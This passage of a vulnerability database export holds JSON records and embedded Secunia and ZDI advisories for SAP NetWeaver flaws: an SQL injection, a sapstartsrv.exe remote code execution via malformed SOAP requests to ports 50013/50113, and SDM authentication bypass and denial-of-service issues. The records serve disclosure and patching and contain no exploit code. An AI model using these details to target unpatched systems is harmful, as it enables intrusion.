"id": "JVNDB-2013-005284"
},
{
"db": "NVD",
"id": "CVE-2013-6869"
},
{
"db": "CNNVD",
"id": "CNNVD-201311-257"
},
{
"db": "CNNVD",
"id": "CNNVD-201311-354"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "IVD",
"id": "b008589a-1efd-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-14529"
},
{
"db": "BID",
"id": "63748"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005284"
},
{
"db": "NVD",
"id": "CVE-2013-6869"
},
{
"db": "CNNVD",
"id": "CNNVD-201311-257"
},
{
"db": "CNNVD",
"id": "CNNVD-201311-354"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-11-20T00:00:00",
"db": "IVD",
"id": "b008589a-1efd-11e6-abef-000c29c66e3d"
},
{
"date": "2013-11-19T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-14529"
},
{
"date": "2013-10-30T00:00:00",
"db": "BID",
"id": "63748"
},
{
"date": "2013-11-27T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-005284"
},
{
"date": "2013-11-23T19:55:03.783000",
"db": "NVD",
"id": "CVE-2013-6869"
},
{
"date": "2013-10-30T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201311-257"
},
{
"date": "2013-11-29T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201311-354"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-11-20T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-14529"
},
{
"date": "2013-11-26T00:16:00",
"db": "BID",
"id": "63748"
},
{
"date": "2013-11-27T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-005284"
},
{
"date": "2018-12-10T19:29:02.280000",
"db": "NVD",
"id": "CVE-2013-6869"
},
{
"date": "2013-11-21T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201311-257"
},
{
"date": "2013-11-29T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201311-354"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201311-257"
},
{
"db": "CNNVD",
"id": "CNNVD-201311-354"
}
],
"trust": 1.2
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver of SRTT_GET_COUNT_BEFORE_KEY_RFC In function SQL Injection vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-005284"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SQL injection",
"sources": [
{
"db": "IVD",
"id": "b008589a-1efd-11e6-abef-000c29c66e3d"
},
{
"db": "CNNVD",
"id": "CNNVD-201311-257"
},
{
"db": "CNNVD",
"id": "CNNVD-201311-354"
}
],
"trust": 1.4
}
}
var-201011-0483
Vulnerability from variot
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of SAP NetWeaver Composition Environment. Authentication is not required to exploit this vulnerability. The specific flaw exists within the sapstartsrv.exe process which listens by default on ports 50013 and 50113. A malformed SOAP request (via POST) can be used to reach an unbounded copy loop which results in attacker-supplied data being written into existing function pointers. It is possible for a remote attacker to leverage this vulnerability to execute arbitrary code. ----------------------------------------------------------------------
Secure your corporate defenses and reduce complexity in handling vulnerability threats with the new Secunia Vulnerability Intelligence Manager (VIM) Beta.
Join the beta: http://secunia.com/products/corporate/vim/
TITLE: SAP NetWeaver Composition Environment Memory Corruption Vulnerability
SECUNIA ADVISORY ID: SA42110
VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/42110/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=42110
RELEASE DATE: 2010-11-10
DISCUSS ADVISORY: http://secunia.com/advisories/42110/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s)
http://secunia.com/advisories/42110/
ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=42110
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION: A vulnerability has been reported in SAP NetWeaver, which can be exploited by malicious people to compromise a vulnerable system.
The vulnerability is caused due to an error in the NetWeaver Composition Environment component when processing SOAP requests within sapstartsrv.exe. This can be exploited to e.g. overwrite certain function pointers and execute arbitrary code by sending specially crafted SOAP requests to port 50013 or 50113.
SOLUTION: Reportedly, a patch is available via SAP Note 1414444.
Further details available in Customer Area: http://secunia.com/products/corporate/EVM/
PROVIDED AND/OR DISCOVERED BY: AbdulAziz Hariri, reported via ZDI
ORIGINAL ADVISORY: http://www.zerodayinitiative.com/advisories/ZDI-10-236/
OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/
DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/
EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/
About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
.
-- Vendor Response: SAP states: A solution was provided via SAP note 1414444 https://service.sap.com/sap/support/notes/1414444
-- Disclosure Timeline: 2010-10-18 - Vulnerability reported to vendor 2010-11-08 - Coordinated public release of advisory
-- Credit: This vulnerability was discovered by: * AbdulAziz Hariri
-- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities.
Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at:
http://www.zerodayinitiative.com
The ZDI is unique in how the acquired vulnerability information is used. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product.
Our vulnerability disclosure policy is available online at:
http://www.zerodayinitiative.com/advisories/disclosure_policy/
Follow the ZDI on Twitter:
http://twitter.com/thezdi
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201011-0483",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": null,
"trust": 0.7,
"vendor": "sap",
"version": null
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-10-236"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "AbdulAziz Hariri",
"sources": [
{
"db": "ZDI",
"id": "ZDI-10-236"
}
],
"trust": 0.7
},
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": null,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "ZDI",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "ZDI-10-236",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "HIGH",
"trust": 0.7,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "ZDI",
"id": "ZDI-10-236",
"trust": 0.7,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-10-236"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of SAP NetWeaver Composition Environment. Authentication is not required to exploit this vulnerability. The specific flaw exists within the sapstartsrv.exe process which listens by default on ports 50013 and 50113. A malformed SOAP request (via POST) can be used to reach an unbounded copy loop which results in attacker-supplied data being written into existing function pointers. It is possible for a remote attacker to leverage this vulnerability to execute arbitrary code. ----------------------------------------------------------------------\n\n\nSecure your corporate defenses and reduce complexity in handling vulnerability threats with the new Secunia Vulnerability Intelligence Manager (VIM) Beta. \n\nJoin the beta: \nhttp://secunia.com/products/corporate/vim/\n\n\n----------------------------------------------------------------------\n\nTITLE:\nSAP NetWeaver Composition Environment Memory Corruption Vulnerability\n\nSECUNIA ADVISORY ID:\nSA42110\n\nVERIFY ADVISORY:\nSecunia.com\nhttp://secunia.com/advisories/42110/\nCustomer Area (Credentials Required)\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=42110\n\nRELEASE DATE:\n2010-11-10\n\nDISCUSS ADVISORY:\nhttp://secunia.com/advisories/42110/#comments\n\nAVAILABLE ON SITE AND IN CUSTOMER AREA:\n * Last Update\n * Popularity\n * Comments\n * Criticality Level\n * Impact\n * Where\n * Solution Status\n * Operating System / Software\n * CVE Reference(s)\n\nhttp://secunia.com/advisories/42110/\n\nONLY AVAILABLE IN CUSTOMER AREA:\n * Authentication Level\n * Report Reliability\n * Secunia PoC\n * Secunia Analysis\n * Systems Affected\n * Approve Distribution\n * Remediation Status\n * Secunia CVSS Score\n * CVSS\n\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=42110\n\nONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:\n * AUTOMATED SCANNING\n\nhttp://secunia.com/vulnerability_scanning/personal/\nhttp://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/\n\nDESCRIPTION:\nA vulnerability has been reported in SAP NetWeaver, which can be\nexploited by malicious people to compromise a vulnerable system. \n\nThe vulnerability is caused due to an error in the NetWeaver\nComposition Environment component when processing SOAP requests\nwithin sapstartsrv.exe. This can be exploited to e.g. overwrite\ncertain function pointers and execute arbitrary code by sending\nspecially crafted SOAP requests to port 50013 or 50113. \n\nSOLUTION:\nReportedly, a patch is available via SAP Note 1414444. \n\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\nPROVIDED AND/OR DISCOVERED BY:\nAbdulAziz Hariri, reported via ZDI\n\nORIGINAL ADVISORY:\nhttp://www.zerodayinitiative.com/advisories/ZDI-10-236/\n\nOTHER REFERENCES:\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\nDEEP LINKS:\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\nEXTENDED DESCRIPTION:\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\nEXTENDED SOLUTION:\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\nEXPLOIT:\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\nprivate users keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n. \n\n-- Vendor Response:\nSAP states:\nA solution was provided via SAP note 1414444\nhttps://service.sap.com/sap/support/notes/1414444\n\n-- Disclosure Timeline:\n2010-10-18 - Vulnerability reported to vendor\n2010-11-08 - Coordinated public release of advisory\n\n-- Credit:\nThis vulnerability was discovered by:\n * AbdulAziz Hariri\n\n-- About the Zero Day Initiative (ZDI):\nEstablished by TippingPoint, The Zero Day Initiative (ZDI) represents\na best-of-breed model for rewarding security researchers for responsibly\ndisclosing discovered vulnerabilities. \n\nResearchers interested in getting paid for their security research\nthrough the ZDI can find more information and sign-up at:\n\n http://www.zerodayinitiative.com\n\nThe ZDI is unique in how the acquired vulnerability information is\nused. Instead, upon notifying the affected product vendor,\nTippingPoint provides its customers with zero day protection through\nits intrusion prevention technology. Explicit details regarding the\nspecifics of the vulnerability are not exposed to any parties until\nan official vendor patch is publicly available. Furthermore, with the\naltruistic aim of helping to secure a broader user base, TippingPoint\nprovides this vulnerability information confidentially to security\nvendors (including competitors) who have a vulnerability protection or\nmitigation product. \n\nOur vulnerability disclosure policy is available online at:\n\n http://www.zerodayinitiative.com/advisories/disclosure_policy/\n\nFollow the ZDI on Twitter:\n\n http://twitter.com/thezdi\n\n\n",
"sources": [
{
"db": "ZDI",
"id": "ZDI-10-236"
},
{
"db": "PACKETSTORM",
"id": "95691"
},
{
"db": "PACKETSTORM",
"id": "95626"
}
],
"trust": 0.81
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "ZDI",
"id": "ZDI-10-236",
"trust": 0.9
},
{
"db": "ZDI_CAN",
"id": "ZDI-CAN-896",
"trust": 0.7
},
{
"db": "SECUNIA",
"id": "42110",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "95691",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "95626",
"trust": 0.1
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-10-236"
},
{
"db": "PACKETSTORM",
"id": "95691"
},
{
"db": "PACKETSTORM",
"id": "95626"
}
]
},
"id": "VAR-201011-0483",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.26917922
},
"last_update_date": "2022-05-17T01:53:39.215000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "A solution was provided via SAP note 1414444",
"trust": 0.7,
"url": "https://service.sap.com/sap/support/notes/1414444"
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-10-236"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 0.8,
"url": "https://service.sap.com/sap/support/notes/1414444"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/42110/"
},
{
"trust": 0.1,
"url": "http://secunia.com/products/corporate/evm/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/secunia_security_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/"
},
{
"trust": 0.1,
"url": "http://secunia.com/products/corporate/vim/"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_scanning/personal/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/42110/#comments"
},
{
"trust": 0.1,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.1,
"url": "https://ca.secunia.com/?page=viewadvisory\u0026vuln_id=42110"
},
{
"trust": 0.1,
"url": "http://www.zerodayinitiative.com/advisories/zdi-10-236/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/about_secunia_advisories/"
},
{
"trust": 0.1,
"url": "http://www.zerodayinitiative.com/advisories/disclosure_policy/"
},
{
"trust": 0.1,
"url": "http://twitter.com/thezdi"
},
{
"trust": 0.1,
"url": "http://www.tippingpoint.com"
},
{
"trust": 0.1,
"url": "http://www.zerodayinitiative.com"
},
{
"trust": 0.1,
"url": "http://www.zerodayinitiative.com/advisories/zdi-10-236"
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-10-236"
},
{
"db": "PACKETSTORM",
"id": "95691"
},
{
"db": "PACKETSTORM",
"id": "95626"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "ZDI",
"id": "ZDI-10-236"
},
{
"db": "PACKETSTORM",
"id": "95691"
},
{
"db": "PACKETSTORM",
"id": "95626"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2010-11-08T00:00:00",
"db": "ZDI",
"id": "ZDI-10-236"
},
{
"date": "2010-11-09T08:44:36",
"db": "PACKETSTORM",
"id": "95691"
},
{
"date": "2010-11-09T01:17:10",
"db": "PACKETSTORM",
"id": "95626"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2010-11-08T00:00:00",
"db": "ZDI",
"id": "ZDI-10-236"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "95626"
}
],
"trust": 0.1
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver Composition Environment sapstartsrv.exe Remote Code Execution Vulnerability",
"sources": [
{
"db": "ZDI",
"id": "ZDI-10-236"
}
],
"trust": 0.7
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "arbitrary",
"sources": [
{
"db": "PACKETSTORM",
"id": "95626"
}
],
"trust": 0.1
}
}
var-201301-0447
Vulnerability from variot
SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. The SAP NetWeaver SDM service has an unspecified error that allows an attacker to exploit a vulnerability to bypass authentication and perform restricted operations. SAP NetWeaver is prone to multiple security vulnerabilities. ----------------------------------------------------------------------
The final version of the CSI 6.0 has been released. Find out why this is not just another Patch Management solution: http://secunia.com/blog/325/
TITLE: SAP NetWeaver SDM Multiple Vulnerabilities
SECUNIA ADVISORY ID: SA51740
VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/51740/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=51740
RELEASE DATE: 2013-01-23
DISCUSS ADVISORY: http://secunia.com/advisories/51740/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s)
http://secunia.com/advisories/51740/
ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=51740
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION: ERPScan has reported multiple vulnerabilities in SAP NetWeaver, which can be exploited by malicious people to disclose certain sensitive information, bypass certain security restrictions, and cause a DoS (Denial of Service).
SOLUTION: Apply SAP Note 1724516.
PROVIDED AND/OR DISCOVERED BY: Alexander Polyakov, ERPScan.
ORIGINAL ADVISORY: SAP: https://service.sap.com/sap/support/notes/1724516
ERPScan (DSECRG-12-044, DSECRG-12-045, DSECRG-12-046, DSECRG-12-047, DSECRG-12-048): http://erpscan.com/advisories/dsecrg-12-044-sap-netweaver-sdm-authentication-bypass/ http://erpscan.com/advisories/dsecrg-12-045-sap-netweaver-sdm-denial-of-service/ http://erpscan.com/advisories/dsecrg-12-046-sap-netweaver-sdm-information-disclosure-and-smbrelay/ http://erpscan.com/advisories/dsecrg-12-047-sap-netweaver-sdm-admin-information-disclosure/ http://erpscan.com/advisories/dsecrg-12-048-sap-netweaver-sdm-admin-dos/
OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
Show details on source website
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201301-0447",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 4.0,
"vendor": "sap",
"version": "7.x"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.30"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.10"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.02"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.01"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.0"
}
],
"sources": [
{
"db": "IVD",
"id": "d040cf88-1f3a-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "c0d6ce62-1f3a-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "c30432ce-1f3a-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "bbf8d5a2-1f3a-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "c9309bba-1f3a-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-00534"
},
{
"db": "CNVD",
"id": "CNVD-2013-00529"
},
{
"db": "CNVD",
"id": "CNVD-2013-00531"
},
{
"db": "CNVD",
"id": "CNVD-2013-00527"
},
{
"db": "CNVD",
"id": "CNVD-2013-00532"
},
{
"db": "BID",
"id": "57523"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Alexander Polyakov",
"sources": [
{
"db": "BID",
"id": "57523"
},
{
"db": "CNNVD",
"id": "CNNVD-201301-502"
}
],
"trust": 0.9
},
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
